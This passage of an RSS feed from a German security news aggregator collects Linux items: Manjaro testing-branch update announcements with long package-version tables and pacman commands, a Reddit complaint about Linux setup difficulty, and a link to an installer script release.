                       kcalendarcore             5.71.0-1             5.72.0-1
                            kcmutils             5.71.0-1             5.72.0-1
                             kcodecs             5.71.0-1             5.72.0-1
                         kcompletion             5.71.0-1             5.72.0-1
                             kconfig             5.71.0-1             5.72.0-1
                      kconfigwidgets             5.71.0-1             5.72.0-1
                           kcontacts           1:5.71.0-1           1:5.72.0-1
                         kcoreaddons             5.71.0-1             5.72.0-1
                              kcrash             5.71.0-1             5.72.0-1
                                kdav            20.04.3-1           1:5.72.0-1
                         kdbusaddons             5.71.0-1             5.72.0-1
                        kdeclarative             5.71.0-1             5.72.0-1
                                kded             5.71.0-1             5.72.0-1
                     kdelibs4support             5.71.0-1             5.72.0-1
                      kdepim-runtime            20.04.3-1            20.04.3-2
                     kdesignerplugin             5.71.0-1             5.72.0-1
                               kdesu             5.71.0-1             5.72.0-1
                           kdewebkit             5.71.0-1             5.72.0-1
                              kdnssd             5.71.0-1             5.72.0-1
                           kdoctools             5.71.0-1             5.72.0-1
                          kemoticons             5.71.0-1             5.72.0-1
                       kfilemetadata             5.71.0-1             5.72.0-1
                        kglobalaccel             5.71.0-1             5.72.0-1
                          kguiaddons             5.71.0-1             5.72.0-1
                           kholidays           1:5.71.0-1           1:5.72.0-1
                               khtml             5.71.0-1             5.72.0-1
                               ki18n             5.71.0-1             5.72.0-1
                         kiconthemes             5.71.0-1             5.72.0-1
                           kidletime             5.71.0-1             5.72.0-1
                       kimageformats             5.71.0-1             5.72.0-1
                               kinit             5.71.0-1             5.72.0-1
                                 kio             5.71.0-1             5.72.0-1
                           kirigami2             5.71.0-1             5.72.0-1
                         kitemmodels             5.71.0-1             5.72.0-1
                          kitemviews             5.71.0-1             5.72.0-1
                         kjobwidgets             5.71.0-1             5.72.0-1
                                 kjs             5.71.0-1             5.72.0-1
                            kjsembed             5.71.0-1             5.72.0-1
                        kmediaplayer             5.71.0-1             5.72.0-1
                           knewstuff             5.71.0-1             5.72.0-1
                      knotifications             5.71.0-1             5.72.0-1
                       knotifyconfig             5.71.0-1             5.72.0-1
                            kpackage             5.71.0-1             5.72.0-1
                              kparts             5.71.0-1             5.72.0-1
                             kpeople             5.71.0-1             5.72.0-1
                           kplotting             5.71.0-1             5.72.0-1
                                kpty             5.71.0-1             5.72.0-1
                        kquickcharts             5.71.0-1             5.72.0-1
                               kross             5.71.0-1             5.72.0-1
                             krunner             5.71.0-1             5.72.0-1
                            kservice             5.71.0-1             5.72.0-1
                         ktexteditor             5.71.0-1             5.72.0-1
                        ktextwidgets             5.71.0-1             5.72.0-1
                     kunitconversion             5.71.0-1             5.72.0-1
                             kwallet             5.71.0-1             5.72.0-1
                            kwayland             5.71.0-1             5.72.0-1
                      kwidgetsaddons             5.71.0-1             5.72.0-1
                       kwindowsystem             5.71.0-1             5.72.0-1
                             kxmlgui             5.71.0-1             5.72.0-1
                       kxmlrpcclient             5.71.0-1             5.72.0-1
                              libgdm             3.36.2-1             3.36.3-1
                             libmbim             1.24.0-1             1.24.2-1
                          libxnvctrl             450.51-1             450.57-1
                     modemmanager-qt             5.71.0-1             5.72.0-1
                                mutt             1.14.5-1             1.14.6-1
                   networkmanager-qt             5.71.0-1             5.72.0-1
                        nvidia-prime                1.0-3                1.0-4
                        oxygen-icons           1:5.71.0-1           1:5.72.0-1
                    oxygen-icons-svg           1:5.71.0-1           1:5.72.0-1
                    plasma-framework             5.71.0-2             5.72.0-1
                             poppler             0.90.0-1             0.90.1-1
                        poppler-glib             0.90.0-1             0.90.1-1
                         poppler-qt5             0.90.0-1             0.90.1-1
                              prison             5.71.0-1             5.72.0-1
                             purpose             5.71.0-2             5.72.0-1
            python-lazy-object-proxy              1.5.0-1              1.5.0-2
            python-prometheus_client              0.8.0-1              0.8.0-2
                   python-setuptools           1:49.1.2-1           1:49.2.0-1
                        python-wrapt             1.12.1-1             1.12.1-2
                     python2-astroid              1.6.5-3                    -
                       python2-isort             4.3.21-1                    -
                      python2-pylint              1.9.5-1                    -
                       python2-wrapt             1.12.1-1                    -
                  qqc2-desktop-style             5.71.0-1             5.72.0-1
                               solid             5.71.0-1             5.72.0-1
                              sonnet             5.71.0-1             5.72.0-1
                         syndication             5.71.0-1             5.72.0-1
                 syntax-highlighting             5.71.0-1             5.72.0-1
                        threadweaver             5.71.0-1             5.72.0-1
                      wireguard-dkms       1.0.20200623-1       1.0.20200712-1
                               xterm                357-1                358-1
                             ipp-usb                    -             0.9.10-1
                        sane-airscan                    -             0.99.9-2


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-11           2020-07-14
-------------------------------------------------------------------------------
                    lib32-fluidsynth              2.1.3-1              2.1.4-1
</code></pre>
<div class="poll" data-poll-status="open" data-poll-type="regular" data-poll-name="poll">
<div>
<div class="poll-container">
<ul><li data-poll-option-id="893d9543968a33fa1039e2d7c2aff9f3">No issue, everything went smoothly</li>
<li data-poll-option-id="f62cf202dc0ce246aa612290c3f33f1f">Yes there was an issue. I was able to resolve it myself.(Please post your solution)</li>
<li data-poll-option-id="e1ee941aacf54cee0c82939acae184cc">Yes i am currently experiencing an issue due to the update. (Please post about it)</li>
</ul></div>
<div class="poll-info">
<p>
<span class="info-number">0</span>
<span class="info-label">voters</span>
</p>
</div>
</div>
</div>
<p>Check if your mirror has already synced:</p>
<ul><li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul><p><small>4 posts - 3 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2020-07-14-kde-frameworks-5-72-linux57-with-fsync-firefox-python-haskell/153194">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Discussion] This is not a rant but I really don't understand the reason everything on Linux should be done harder and more complicated if possible. How new people could adapt when it looks scary.]]></title>
<description><![CDATA[Yesterday I was fighting 2 hours to make Expo cli working on Linux. Couple days before I made it work on Windows in less than 2 minutes. I had problems with permissions on Linux. Some things needed Root access, some worked without.... Npm wasn't working, had to go with yarn...  It was a mess. Ano...]]></description>
<link>https://tsecurity.de/de/1146516/linux-tipps/discussion-this-is-not-a-rant-but-i-really-dont-understand-the-reason-everything-on-linux-should-be-done-harder-and-more-complicated-if-possible-how-new-people-could-adapt-when-it-looks-scary/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1146516/linux-tipps/discussion-this-is-not-a-rant-but-i-really-dont-understand-the-reason-everything-on-linux-should-be-done-harder-and-more-complicated-if-possible-how-new-people-could-adapt-when-it-looks-scary/</guid>
<pubDate>Fri, 12 Jun 2020 17:45:06 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Yesterday I was fighting 2 hours to make Expo cli working on Linux. Couple days before I made it work on Windows in less than 2 minutes.</p> <p>I had problems with permissions on Linux. Some things needed Root access, some worked without.... Npm wasn't working, had to go with yarn... </p> <p>It was a mess.</p> <p>Another example: rclone. On windows you have 100 program that can help you sync to the cloud and you can make them work in 2 minutes. You have a nice GUI...</p> <p>On Linux: You need master degree to setup rclone properly. </p> <p>Why people always make it harder? Is it some feeling of "being better" if you can set it up from the terminal with 100 lines you need to put yourself to achieve the same thing you can do with GUI and 2 clicks? </p> <p>Doesn't make sense.</p> <p>Take a look at Arch. Someone can make an installer and everything can be done in 5 minutes. </p> <p>But here they are spending 30 minutes (if you already know what you are doing) and 1 to 2 hours if you are first timer just to make it to the same point: Getting a working OS that can be done with an Installer. Just don't put any bloat and keep it basic and you will get the same OS you get making it from the terminal.</p> <p>If it's easier/lazier people more easily can adapt to it.</p> <p>When you do the same with 20 lines of code how someone can choose it over something you can do with 2 clicks and GUI?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Sprincle"> /u/Sprincle </a> <br><span><a href="https://www.reddit.com/r/linux/comments/h7msvs/discussion_this_is_not_a_rant_but_i_really_dont/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/h7msvs/discussion_this_is_not_a_rant_but_i_really_dont/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[I just released v2.0.0 of ginstall.sh, a user-friendly script for installing and updating statically compiled applications like hugo, docker-compose, ffmpeg, rclone and youtube-dl. It now supports almost 70 different applications in total. Check it o]]></title>
<description><![CDATA[submitted by    /u/projectdatahoarder  [link]   [comments]]]></description>
<link>https://tsecurity.de/de/1141566/linux-tipps/i-just-released-v200-of-ginstallsh-a-user-friendly-script-for-installing-and-updating-statically-compiled-applications-like-hugo-docker-compose-ffmpeg-rclone-and-youtube-dl-it-now-supports-almost-70-different-applications-in-total-check-it-out/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1141566/linux-tipps/i-just-released-v200-of-ginstallsh-a-user-friendly-script-for-installing-and-updating-statically-compiled-applications-like-hugo-docker-compose-ffmpeg-rclone-and-youtube-dl-it-now-supports-almost-70-different-applications-in-total-check-it-out/</guid>
<pubDate>Mon, 08 Jun 2020 21:15:18 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/projectdatahoarder"> /u/projectdatahoarder </a> <br><span><a href="https://github.com/whalehub/ginstall.sh">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/gz3vix/i_just_released_v200_of_ginstallsh_a_userfriendly/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2020-05-29 - Kernels, AMDVLK, Deepin, Cinnamon, Gnome, Haskell, Python]]></title>
<description><![CDATA[Hello community,
Another testing branch update with some interesting updates for you!
1200×859
Our next point-release of #Lysia is about to be ready this weekend. Report an issues you may have in testing to us now. #stayhome, #staysafe, #stayhealthy*
Most of our Kernel got updated
More updates to...]]></description>
<link>https://tsecurity.de/de/1132443/unix-server/testing-update-2020-05-29-kernels-amdvlk-deepin-cinnamon-gnome-haskell-python/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1132443/unix-server/testing-update-2020-05-29-kernels-amdvlk-deepin-cinnamon-gnome-haskell-python/</guid>
<pubDate>Fri, 29 May 2020 17:17:57 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello community,</p>
<p>Another <strong>testing</strong> branch update with some interesting updates for you!</p>
<p></p><div class="lightbox-wrapper"><a class="lightbox" href="https://pbs.twimg.com/media/EZHnBtLWAAUBzt3?format=jpg&amp;name=medium" title=""><img src="https://pbs.twimg.com/media/EZHnBtLWAAUBzt3?format=jpg&amp;name=medium" alt="" width="690" height="493"><div class="meta"><svg class="fa d-icon d-icon-far-image svg-icon" aria-hidden="true"><use xlink:href="#far-image"></use></svg><span class="filename"></span><span class="informations">1200×859</span><svg class="fa d-icon d-icon-discourse-expand svg-icon" aria-hidden="true"><use xlink:href="#discourse-expand"></use></svg></div></a></div><br>
Our next point-release of <span class="hashtag">#Lysia</span> is about to be ready this weekend. Report an issues you may have in <strong>testing</strong> to us now. <span class="hashtag">#stayhome</span>, <span class="hashtag">#staysafe</span>, <span class="hashtag">#stayhealthy</span>*
<ul><li>Most of our <strong>Kernel</strong> got updated</li>
<li>More updates to <strong>Cinnamon</strong> and <strong>Deepin</strong>
</li>
<li>
<strong>Gnome</strong> updates to several packages</li>
<li>
<strong>AMDVLK</strong> is now at <a href="https://github.com/GPUOpen-Drivers/AMDVLK/releases/tag/v-2020.Q2.4">2020.Q2.4</a>
</li>
<li>Regular <strong>Haskell</strong>, <strong>Python</strong> updates</li>
<li>The usual upstream updates and massrebuilds by Arch</li>
</ul><p>If you like following latest Plasma development you may also like to check out our current version of <a href="https://osdn.net/projects/manjaro-community/storage/kde-dev/20.0/">manjaro-kde-dev</a>, which we build on a regular basis against kde-git master packages. Also check out our latest release <strong>Manjaro Lysia 20.0.1</strong>! <a href="https://osdn.net/projects/manjaro/storage/xfce/20.0.1/">XFCE</a>, <a href="https://osdn.net/projects/manjaro/storage/kde/20.0.1/">KDE</a> and <a href="https://osdn.net/projects/manjaro/storage/gnome/20.0.1/">Gnome</a></p>
<hr><h3>Upstream notice</h3>
<p><strong>Arch</strong> updated their default compression to <a href="https://lists.archlinux.org/pipermail/arch-dev-public/2019-December/029752.html">zstd</a>. We adopted to the same standard. More and more packages will have the <code>zst</code> extension from now on. If you get for what ever reason an error with ZSTD not supported as archive format you can do this:</p>
<pre><code class="lang-auto">sudo pacman -Syy
sudo pacman -S pacman-static
sudo pacman-static -Syyu
</code></pre>
<hr><p><strong>Our current supported kernels</strong></p>
<ul><li>linux44 4.4.225</li>
<li>linux49 4.9.225</li>
<li>linux414 4.14.182</li>
<li>linux419 4.19.125</li>
<li>linux54 5.4.43</li>
<li>linux56 5.6.15</li>
<li>linux57 5.7-rc7</li>
<li>linux54-rt 5.4.39_rt23</li>
<li>linux56-rt 5.6.14_rt7</li>
</ul><p><strong>Package Changes</strong> (Fri May 29 16:12:10 CEST 2020)</p>
<ul><li>testing community x86_64:  434 new and 419 removed package(s)</li>
<li>testing core x86_64:  21 new and 22 removed package(s)</li>
<li>testing extra x86_64:  154 new and 153 removed package(s)</li>
<li>testing multilib x86_64:  6 new and 6 removed package(s)</li>
</ul><pre><code class="lang-auto">:: Different overlay package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-26           2020-05-29
-------------------------------------------------------------------------------
                            cinnamon              4.6.1-1              4.6.2-1
                           cpu-x 4.0.0.rev20.ga27a649-1 4.0.0.rev23.g08ebef5-1
                              etcher             1.5.93-1             1.5.94-1
                      guayadeque 0.4.6.r2147.a0666894-1 0.4.6.r2149.ed0b3ca4-1
                  hw-probe 1.6+beta.10.gceb95a4aa7-1 1.6+beta.15.gd1de28b1ba-1
                            libcpuid  0.5.0.r0.g5da90c9-1  0.5.0.r3.g52c5f50-1
                      linux54-rt-zfs              0.8.4-3              0.8.4-5
                          linux56-rt         5.6.10_rt5-2         5.6.14_rt7-2
                linux56-rt-acpi_call              1.1.0-4              1.1.0-5
                 linux56-rt-bbswitch                0.8-4                0.8-5
              linux56-rt-broadcom-wl       6.30.223.271-4       6.30.223.271-5
                  linux56-rt-headers         5.6.10_rt5-2         5.6.14_rt7-2
              linux56-rt-ndiswrapper               1.63-2               1.63-3
             linux56-rt-nvidia-340xx            340.108-4            340.108-5
             linux56-rt-nvidia-390xx            390.132-4            390.132-5
             linux56-rt-nvidia-418xx            418.113-4            418.113-5
             linux56-rt-nvidia-430xx             430.64-4             430.64-5
             linux56-rt-nvidia-435xx             435.21-4             435.21-5
             linux56-rt-nvidia-440xx             440.82-4             440.82-5
                    linux56-rt-r8168           8.048.02-3           8.048.02-4
                linux56-rt-rtl8723bu           20200405-2           20200405-3
                 linux56-rt-tp_smapi               0.43-4               0.43-5
              linux56-rt-vhba-module           20200106-4           20200106-5
  linux56-rt-virtualbox-host-modules              6.1.8-1              6.1.8-2
                    cinnamon-session                    -            4.6.1-0.1
            cinnamon-settings-daemon                    -            4.6.1-0.1
               folder-color-switcher                    -              1.4.2-2
                      linux56-rt-zfs                    -              0.8.4-4
                        mint-x-icons                    -              1.5.5-1
                        mint-y-icons                    -              1.4.1-1
                              muffin                    -            4.6.1-0.1
                                nemo                    -            4.6.2-0.1


:: Different sync package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-26           2020-05-29
-------------------------------------------------------------------------------
               aarch64-linux-gnu-gdb                9.1-1                9.2-1
                            adriconf              1.6.1-1                1.7-1
                                agda             2.6.1-42             2.6.1-45
                            allegro4            4.4.3.1-2            4.4.3.1-3
                             ansible              2.9.9-1              2.9.9-2
                     archlinux-repro           20200507-1           20200527-1
                              ardour                6.0-1                6.0-2
                     arduino-builder              1.5.2-2              1.5.3-1
                   arm-none-eabi-gdb                9.1-1                9.2-1
                        armagetronad          0.2.8.3.4-3          0.2.8.3.5-1
                            audacity            1:2.4.1-3            1:2.4.1-4
                             avr-gdb                9.1-1                9.2-1
                             aws-cli            1.18.60-1            1.18.67-1
                                 bat             0.15.1-1             0.15.4-1
                               bazel              3.1.0-1              3.2.0-1
                           blueberry              1.3.5-1              1.3.8-1
                             blueman              2.1.2-1              2.1.3-1
                           borgmatic              1.5.4-1              1.5.5-1
                            buildbot              2.7.0-2              2.8.0-1
                       buildbot-docs              2.7.0-2              2.8.0-1
                     buildbot-worker              2.7.0-2              2.8.0-1
                       cabal-install           3.2.0.0-14           3.2.0.0-17
                           celluloid               0.18-1               0.19-1
                               cgrep            6.6.32-32            6.6.32-34
                            checksec              2.1.0-1              2.1.0-2
                          codeblocks             17.12-10              20.03-1
                              conmon           1:2.0.16-1           1:2.0.17-1
                             cryptol            2.8.0-121            2.8.0-125
                               darcs            2.14.4-10            2.14.4-13
                                dart              2.8.2-1              2.8.3-1
                   deepin-calculator             5.5.10-1             5.5.12-1
                     deepin-calendar              5.6.3-1              5.6.4-1
              deepin-desktop-schemas            5.5.0.1-1            5.5.0.5-1
                       deepin-editor              5.6.9-1             5.6.10-1
                   deepin-icon-theme         2020.05.21-1         2020.05.29-1
               deepin-system-monitor              5.6.2-1              5.6.3-1
                               dhall            1.32.0-12            1.32.0-15
                          dhall-bash            1.0.30-13            1.0.30-16
                          dhall-json             1.6.4-12             1.6.4-15
                                 din               46.3-1                 47-1
                              docopt              0.6.2-1              0.6.2-2
               dolphin-emu 1:5.0.r12015.1bedbdf3c0-1 1:5.0.r12076.53aff81c45-1
                              drupal              8.8.5-1              8.8.6-1
                              embree              3.9.0-1             3.10.0-1
                          emscripten            1.39.11-1            1.39.16-1
                               eolie           0.9.98.1-1             0.9.99-1
                              fcitx5     0.0.0.20200526-1     0.0.0.20200529-1
                        fcitx5-anthy     0.0.0.20200520-1     0.0.0.20200527-1
               fcitx5-chinese-addons   0.0.0.20200526.1-1     0.0.0.20200529-1
                           fcitx5-qt     0.0.0.20200526-1     0.0.0.20200528-1
                         fcitx5-rime     0.0.0.20200522-1     0.0.0.20200527-1
                       fcitx5-unikey     0.0.0.20200522-1     0.0.0.20200527-1
                          feedreader             2.10.0-3             2.11.0-1
                             fig2dev              3.2.7-2            3.2.7.b-1
               firefox-ublock-origin             1.27.6-1            1.27.10-1
                              foxdot              0.8.7-1              0.8.8-1
                                gavl              1.4.0-3              1.4.0-4
                           git-annex         8.20200522-6         8.20200522-9
                          git-repair        1.20200504-10        1.20200504-13
                              gitlab             13.0.0-1             13.0.1-1
                       gitlab-gitaly             13.0.0-1             13.0.1-1
                        gitlab-shell           2:13.2.0-1           2:13.2.0-2
                    gitlab-workhorse             8.32.0-1             8.32.1-1
                       gnome-applets             3.36.0-1             3.36.4-1
                         gnome-boxes             3.36.0-1             3.36.4-1
                     gnome-flashback 3.35.2+25+g2553c69-1             3.36.3-1
                         gnome-games             3.36.0-1             3.36.1-1
                 gnome-initial-setup             3.36.1-1             3.36.2-1
                         gnome-latex             3.32.0-1             3.36.0-1
                         gnome-panel             3.36.0-1             3.36.1-1
                     gnome-subtitles                1.6-1                1.6-2
                             gnucash                3.9-2               3.10-1
                        gnucash-docs                3.9-1               3.10-1
golang-github-linuxdeepin-go-dbus-factory         1.6.4-1            1.6.4.4-1
                             gpodder            3.10.13-1            3.10.15-1
                            gpsprune               19.2-1                 20-1
                              gpxsee               7.25-1               7.29-1
                      grafana-zabbix             3.12.1-1             3.12.2-1
                              grsync              1.2.6-4              1.2.8-1
                               gsoap            2.8.102-1            2.8.103-1
                            guitarix             0.39.0-3             0.40.0-1
                       haskell-aeson            1.5.0.0-1            1.5.1.0-1
         haskell-aeson-better-errors          0.9.1.0-176          0.9.1.0-178
                haskell-aeson-compat             0.3.9-94             0.3.9-96
                  haskell-aeson-diff            1.1.0.9-7           1.1.0.9-11
                haskell-aeson-pretty             0.8.8-41             0.8.8-43
                    haskell-aeson-qq             0.8.3-55             0.8.3-57
                  haskell-aeson-yaml           1.0.6.0-32           1.0.6.0-34
                haskell-authenticate            1.3.5-115            1.3.5-118
          haskell-authenticate-oauth           1.6.0.1-93           1.6.0.1-96
                         haskell-aws              0.22-47              0.22-50
            haskell-binary-instances           1.0.0.1-13           1.0.0.1-15
              haskell-binary-orphans             1.0.1-11             1.0.1-12
               haskell-binary-tagged               0.2-61               0.2-63
                  haskell-bower-json          1.0.0.1-174          1.0.0.1-176
              haskell-broadcast-chan              0.2.1-7            0.2.1.1-1
   haskell-bytestring-strict-builder           0.4.5.3-69           0.4.5.3-70
     haskell-bytestring-tree-builder           0.2.7.3-42           0.2.7.3-43
                 haskell-casa-client             0.0.1-36             0.0.1-39
                  haskell-casa-types             0.0.1-30             0.0.1-32
                     haskell-cassava           0.5.2.0-26           0.5.2.0-27
          haskell-cassava-megaparsec             2.0.1-28             2.0.1-29
                       haskell-cborg            0.2.3.0-4            0.2.3.0-6
                  haskell-cborg-json           0.2.2.0-20           0.2.2.0-22
                  haskell-cheapskate           0.1.1.2-86           0.1.1.2-89
               haskell-clash-prelude             1.2.1-11             1.2.1-12
                     haskell-concise          0.1.0.1-173          0.1.0.1-174
                   haskell-criterion           1.5.6.2-57           1.5.6.2-61
       haskell-criterion-measurement           0.1.2.0-44           0.1.2.0-46
             haskell-data-serializer           0.3.4.1-28           0.3.4.1-29
                haskell-data-textual           0.3.0.3-26           0.3.0.3-27
                         haskell-dav             1.3.4-99            1.3.4-102
                        haskell-dbus           1.2.15.1-5           1.2.15.1-6
               haskell-dbus-hslogger           0.1.0.1-40           0.1.0.1-41
              haskell-deferred-folds          0.9.10.1-77          0.9.10.1-78
                 haskell-descriptive            0.9.5-107            0.9.5-109
                haskell-doctemplates              0.8.2-9             0.8.2-11
        haskell-edit-distance-vector           1.0.0.4-54           1.0.0.4-55
                   haskell-esqueleto           3.3.3.0-20           3.3.3.0-22
                       haskell-extra              1.7.2-1              1.7.2-2
                  haskell-fdo-notify            0.3.1-292            0.3.1-293
                 haskell-filepattern             0.1.2-13             0.1.2-14
           haskell-ghc-lib-parser-ex           8.10.0.5-3           8.10.0.5-4
                     haskell-githash           0.1.4.0-28           0.1.4.0-31
            haskell-hackage-security           0.6.0.1-20           0.6.0.1-23
             haskell-haddock-library             1.8.0-58             1.8.0-60
                      haskell-hakyll          4.13.3.0-35          4.13.3.0-40
                       haskell-hasql             1.4.2-19             1.4.2-21
                  haskell-hasql-pool              0.5.2-4              0.5.2-6
           haskell-hasql-transaction           1.0.0.1-23           1.0.0.1-25
                haskell-hjsonpointer             1.5.0-91             1.5.0-93
                 haskell-hledger-lib            1.17.1-19            1.17.1-21
                    haskell-hopenpgp             2.9.4-84             2.9.4-87
                       haskell-hpack             0.34.1-4             0.34.1-7
                       haskell-hslua              1.1.0-5              1.1.0-6
         haskell-hslua-module-system             0.2.1-38             0.2.1-39
           haskell-hslua-module-text             0.2.1-47             0.2.1-48
                   haskell-hspec-wai            0.10.1-31            0.10.1-33
              haskell-hspec-wai-json            0.10.1-36            0.10.1-38
                haskell-hsyaml-aeson           0.2.0.0-36           0.2.0.0-38
                        haskell-http        4000.3.14-191        4000.3.14-195
               haskell-http-api-data           0.4.1.1-30           0.4.1.1-31
                 haskell-http-client           0.6.4.1-59           0.6.4.1-62
             haskell-http-client-tls          0.3.5.3-234          0.3.5.3-237
                haskell-http-conduit          2.3.7.3-126          2.3.7.3-129
               haskell-http-download           0.2.0.0-56           0.2.0.0-59
                haskell-http-streams          0.8.7.1-104          0.8.7.1-109
                  haskell-http-types            0.12.3-55            0.12.3-56
                       haskell-http2             2.0.4-12             2.0.4-14
                  haskell-httpd-shed          0.4.1.1-119          0.4.1.1-122
                         haskell-hxt          9.3.1.18-76          9.3.1.18-79
          haskell-incremental-parser            0.4.0.2-3            0.4.0.2-4
   haskell-insert-ordered-containers            0.2.3.1-9           0.2.3.1-11
                 haskell-interpolate            0.2.0-145            0.2.0-146
                       haskell-ipynb           0.1.0.1-17           0.1.0.1-21
                 haskell-ixset-typed               0.5-18               0.5-19
                        haskell-jose             0.8.3-11             0.8.3-14
                   haskell-js-jquery            3.3.1-429            3.3.1-433
                  haskell-lens-aeson               1.1-34               1.1-36
             haskell-microlens-aeson           2.3.0.4-56           2.3.0.4-58
                 haskell-microstache          1.0.1.1-151          1.0.1.1-153
                    haskell-mustache            2.3.1-101            2.3.1-104
          haskell-neat-interpolation             0.5.1-17             0.5.1-18
                  haskell-network-ip           0.3.0.3-32           0.3.0.3-33
                 haskell-network-uri           2.6.3.0-86           2.6.3.0-89
             haskell-optparse-simple          0.1.1.2-195          0.1.1.2-198
                haskell-pandoc-types              1.20-37              1.20-39
                      haskell-pantry           0.4.0.1-53           0.4.0.1-56
                     haskell-parsers           0.12.10-44           0.12.10-45
                        haskell-path              0.8.0-3              0.8.0-5
                     haskell-path-io             1.6.0-29             1.6.0-31
                  haskell-persistent          2.10.5.2-34          2.10.5.2-36
               haskell-persistent-qq           2.9.1.1-86           2.9.1.1-88
           haskell-persistent-sqlite          2.10.6.2-61          2.10.6.2-63
         haskell-persistent-template           2.8.2.3-38           2.8.2.3-40
             haskell-persistent-test           2.0.3.1-32           2.0.3.1-34
                  haskell-pipes-http            1.0.6-146            1.0.6-149
           haskell-postgresql-binary            0.12.2-48            0.12.2-50
               haskell-prettyprinter              1.6.1-9             1.6.1-10
 haskell-prettyprinter-ansi-terminal           1.1.1.2-90           1.1.1.2-91
haskell-prettyprinter-convert-ansi-wl-pprint       1.1-87               1.1-88
        haskell-quickcheck-instances            0.3.22-29             0.3.23-1
             haskell-rio-prettyprint           0.1.0.0-66           0.1.0.0-68
                    haskell-safecopy             0.10.3-5             0.10.3-6
                         haskell-sbv               8.6-80               8.6-84
                   haskell-serialise            0.2.3.0-6            0.2.3.0-8
                     haskell-servant              0.17-41              0.17-44
              haskell-servant-server              0.17-46              0.17-49
             haskell-servant-swagger             1.1.8-49             1.1.8-52
                       haskell-shake               0.19-4               0.19-7
                 haskell-shakespeare            2.0.24-30            2.0.24-32
                 haskell-skylighting              0.8.4-5              0.8.4-8
            haskell-skylighting-core              0.8.4-5              0.8.4-8
                   haskell-snap-core           1.0.4.1-87           1.0.4.1-90
                 haskell-snap-server            1.1.1.2-6           1.1.1.2-10
                   haskell-sourcemap            0.1.6-182            0.1.6-184
                  haskell-statistics          0.15.2.0-22          0.15.2.0-24
                    haskell-swagger2                2.6-6                2.6-8
       haskell-tamarin-prover-theory             1.4.1-87             1.4.1-89
                   haskell-tasty-lua             0.2.2-14             0.2.2-15
                     haskell-texmath          0.12.0.2-15          0.12.0.2-18
                haskell-text-builder           0.6.6.1-38           0.6.6.1-39
                  haskell-text-short             0.1.3-30             0.1.3-31
                   haskell-text-show              3.8.5-9             3.8.5-10
                       haskell-tidal              1.5.1-1              1.5.2-1
                   haskell-tree-diff               0.1-90               0.1-92
                    haskell-trifecta               2.1-43               2.1-44
                  haskell-uri-encode           1.5.0.5-87           1.5.0.5-90
                         haskell-wai           3.2.2.1-55           3.2.2.1-57
              haskell-wai-app-static           3.1.7.1-93           3.1.7.1-96
                 haskell-wai-conduit          3.0.0.4-202          3.0.0.4-203
                    haskell-wai-cors             0.2.7-46             0.2.7-47
                   haskell-wai-extra           3.0.29.2-1           3.0.29.2-3
          haskell-wai-handler-launch           3.0.3.1-57           3.0.3.1-60
                  haskell-wai-logger             2.3.6-79             2.3.6-81
       haskell-wai-middleware-static             0.8.3-31             0.8.3-32
              haskell-wai-websockets          3.0.1.2-139          3.0.1.2-140
                        haskell-warp            3.3.11-10             3.3.12-3
                    haskell-warp-tls            3.2.11-76            3.2.11-79
                        haskell-wreq          0.5.3.2-200          0.5.3.2-203
                  haskell-xml-hamlet           0.5.0.1-87           0.5.0.1-89
                haskell-xss-sanitize            0.3.6-124            0.3.6-127
                        haskell-yaml           0.11.4.0-8          0.11.4.0-10
                       haskell-yesod          1.6.0.1-101          1.6.0.1-104
                  haskell-yesod-auth            1.6.10-39            1.6.10-42
                  haskell-yesod-core            1.6.18-27            1.6.18-30
               haskell-yesod-default            1.2.0-737            1.2.0-740
                  haskell-yesod-form            1.6.7-179            1.6.7-182
            haskell-yesod-persistent          1.6.0.4-123          1.6.0.4-126
                haskell-yesod-static          1.6.0.1-382          1.6.0.1-385
                  haskell-yesod-test            1.6.9-140            1.6.9-143
                             hledger          1.17.1.1-23          1.17.1.1-25
                          hledger-ui          1.17.1.1-31          1.17.1.1-33
                         hledger-web            1.17.1-47            1.17.1-50
                               hlint              3.0.2-4              3.0.4-2
                              hoogle         5.0.17.15-53         5.0.17.15-56
                      hopenpgp-tools            0.23.1-46            0.23.1-49
                           hyperfine             1.10.0-1             1.10.0-2
                           hyperscan              5.2.1-1              5.3.0-1
                         ibm-sw-tpm2               1563-1               1628-2
                               idris              1.3.3-4              1.3.3-7
                                ispc             1.12.0-2             1.13.0-1
                           java-rxtx            2.2pre2-6            2.2pre2-7
                                jmol            14.30.2-1            14.31.0-1
                               jsmol            14.30.2-1            14.31.0-1
                                 k9s             0.19.7-1             0.20.1-1
                                kbfs              5.4.2-1              5.5.1-1
                          kcm-fcitx5     0.0.0.20200522-1     0.0.0.20200528-1
                             keybase              5.4.2-1              5.5.1-1
                         keybase-gui              5.4.2-1              5.5.1-1
                               knemo  0.7.7.git20151003-3                    -
                                knot              2.9.4-1              2.9.5-1
               kvantum-theme-materia           20200312-1           20200523-1
                             l3afpad        0.8.18.1.11-4        0.8.18.1.11-5
                            libffado              2.4.2-3              2.4.3-1
                              libime   0.0.0.20200526.1-1   0.0.0.20200528.1-1
                             liblxqt             0.15.0-2             0.15.1-1
                          libmanette              0.2.3-1              0.2.4-1
                            libressl              3.1.1-1              3.1.2-1
            libretro-beetle-pce-fast                971-1                976-1
                 libretro-beetle-psx               2284-1               2311-1
